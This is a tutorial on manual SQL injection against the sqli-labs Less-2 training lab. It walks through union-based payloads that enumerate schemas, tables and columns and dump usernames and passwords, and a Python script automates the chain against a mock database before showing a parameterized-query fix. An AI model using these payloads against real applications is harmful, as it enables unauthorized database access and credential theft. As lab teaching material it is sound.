Manual SQL injection examples and dumping a database
Preface
This article walks through the basic manual SQL injection process. If you are familiar with the knowledge points covered in the sqli-labs exercises above, you can use the following steps to dump a database (脱裤, "taking off the pants", in the original slang). These steps are also the foundation of every other dumping technique, so anyone who wants to be proficient in SQL injection needs to understand and master this basic procedure.
For convenience, we again use the numeric injection point from the previous article as the example.
Determine the number of fields
From the previous introduction we already know that the id parameter of http://localhost/sqlilabs/Less-2/?id=1 is an injection point.
The SQL statements in the background are roughly written as follows:
select username,password,[....] from table where id=userinput
We then use an ORDER BY clause to determine how many fields the SELECT query returns.
Then payload becomes:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
ORDER BY n sorts by the n-th selected column and raises an error once n exceeds the number of selected columns. So if order by 3 still returns normally but order by 4 causes an error, the SELECT returns exactly three fields.
Find the display positions
Next we determine which of the three selected fields are actually rendered on the page (the "display positions").
Either of the following payloads works. Both make the original WHERE condition match no row (id=-1, or id=1 and 1=2), so the only row left to render is the one supplied by our UNION SELECT:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
With either payload the page is displayed as follows:
The page shows the markers 2 and 3, so the second and third fields are the display positions; the first field is never rendered.
Query database information
Knowing the display positions, we can put any expression we like into them, for example the database version and the current database name. The following payload retrieves both:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
The page is displayed as follows:
The version information of the database and the information of the currently used database are displayed on the page.
In the same way we can enumerate the names of every database on the server from information_schema.SCHEMATA, one row at a time with LIMIT.
The payloads are as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1    (first database name)
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1    (second database name)
...
Alternatively, group_concat(SCHEMA_NAME) returns all names in a single request, as the table-name step below does.
Query the table names
Because database() returns the name of the database the web application is currently using, we can use database() in the WHERE clause to list all tables in it. We already know from the previous step that the current database is security.
The constructed payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
In this way, all the table names in the current database are obtained. The returned result is:
Therefore, we know that there are four tables in the current database:emails,referers,uagents,users.
Query the column names
Once the table name is known, information_schema.columns gives us every column of that table.
Payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273
The second form uses the hexadecimal encoding of the string users (0x7573657273), which MySQL accepts in place of a quoted string literal; it is useful when single quotes are filtered or escaped.
The page displays the following results:
From this result we would conclude that the users table has the columns USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, id, name, password. That is misleading: in my local test the users table of the security database actually contains only id, username and password. The remaining names belong to tables also called users in other databases on the same server, because the query filters on table_name only. To restrict the result to the current database, add the schema to the WHERE clause: where table_name='users' and table_schema=database().
With the same payload we can also learn the column names of emails, referers and uagents.
However, information_schema.columns is not always available: the backend query may only allow additions to the WHERE clause, or information_schema may be inaccessible. In that case you can only guess column names from experience. Guessing is straightforward with an EXISTS subquery; the same trick also works for guessing table names. Assume we already know the table name.
The test statement is as follows:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
The key part is exists(select <guessed column name> from users). If the users table has no column named uname, the query fails: the page either displays nothing or shows the SQL error directly.
As shown in the following figure:
The following payload instead tests a column that does exist in the users table:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
Because the users table has a username column, this statement returns the normal page, which confirms that the column username exists in the users table.
Dumping the database
Knowing all the table and column names of the current database, we can dump all of its data. As an example, we download the entire users table.
You can use the following payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
This returns every username and password in one response. In practice, insert a separator between the two values, for example group_concat(username,0x3a,password), so that the concatenated output can be split again (0x3a is a colon). Note that group_concat truncates its output at group_concat_max_len (1024 bytes by default), so very large tables have to be paged with LIMIT. Data from the other tables can be obtained the same way.
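The following script is an added example, not code from the original article or from sqli-labs. It rebuilds the whole procedure above (counting fields with ORDER BY, finding the display positions with UNION SELECT, guessing columns with EXISTS, and dumping a table with group_concat) against a mock of the Less-2 numeric injection point. The mock uses an in-memory SQLite database with constructed sample rows so it runs offline; the function names and the three-column users table are assumptions for illustration. The MySQL-only parts of the article (version(), information_schema) have no SQLite counterpart and are not reproduced, but the injection mechanics are the same.

```python
"""Added example: the manual union-based SQL injection procedure automated
against a mock of the sqli-labs Less-2 numeric injection point (SQLite stands
in for MySQL; sample data and function names are assumptions)."""
import sqlite3


def make_db():
    """Constructed sample database with a three-column users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'),
                                 (2,'Angelina','I-kill-you'),
                                 (3,'Dummy','p@ssword');
    """)
    return con


def vulnerable_query(con, user_input):
    """Mirrors the article's backend: the id value is concatenated straight
    into the SQL, exactly like the Less-2 numeric injection point. The page
    renders only the 2nd and 3rd selected fields (username, password)."""
    sql = f"SELECT id, username, password FROM users WHERE id={user_input} LIMIT 0,1"
    row = con.execute(sql).fetchone()
    return None if row is None else (row[1], row[2])


def count_columns(con, max_cols=10):
    """Step 1: ORDER BY n works while n <= number of selected fields and
    errors once n exceeds it; the last n that works is the field count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(con, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("no ORDER BY error up to max_cols")


def find_display_positions(con, ncols):
    """Step 2: id=-1 matches no real row, so the page shows the UNION row;
    numbering each column reveals which positions are rendered."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    shown = vulnerable_query(con, f"-1 UNION SELECT {markers}")
    return [int(v) for v in shown]


def column_exists(con, table, column):
    """EXISTS-based guessing: a real column leaves the page intact, a wrong
    guess makes the query fail (error or empty page)."""
    try:
        shown = vulnerable_query(con, f"1 AND EXISTS(SELECT {column} FROM {table})")
    except sqlite3.OperationalError:
        return False
    return shown is not None


def dump_table(con, ncols, positions, table, cols):
    """Dump: put group_concat of the wanted columns into the first displayed
    position, with ':' between fields and ',' between rows so the blob can be
    split back into records (MySQL: group_concat(username,0x3a,password))."""
    pos = positions[0]
    select_list = [str(i) for i in range(1, ncols + 1)]
    select_list[pos - 1] = "group_concat(" + " || ':' || ".join(cols) + ", ',')"
    shown = vulnerable_query(con, f"-1 UNION SELECT {','.join(select_list)} FROM {table}")
    blob = shown[positions.index(pos)]
    return [tuple(rec.split(":")) for rec in blob.split(",")]


def safe_query(con, user_input):
    """The fix for the backend: bind id as a parameter so it is always data,
    never SQL. Injected text simply matches no row."""
    row = con.execute("SELECT id, username, password FROM users WHERE id=? LIMIT 0,1",
                      (user_input,)).fetchone()
    return None if row is None else (row[1], row[2])


if __name__ == "__main__":
    con = make_db()
    n = count_columns(con)                      # 3
    pos = find_display_positions(con, n)        # [2, 3]
    print("fields:", n, "display positions:", pos)
    print("uname exists:", column_exists(con, "users", "uname"))        # False
    print("username exists:", column_exists(con, "users", "username"))  # True
    print(dump_table(con, n, pos, "users", ["username", "password"]))
    print("hardened:", safe_query(con, "-1 UNION SELECT 1,2,3"))        # None
```

Each attacker function sends exactly the payload shape the corresponding section of the article uses; only the target is simulated. Running it shows the whole chain from "how many fields" to a parsed list of credentials, and the final line shows that the same payload against the parameterized query returns nothing.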
Summary
The above is a complete example of manual SQL injection, from counting fields to dumping a table. Further articles on SQL injection will follow.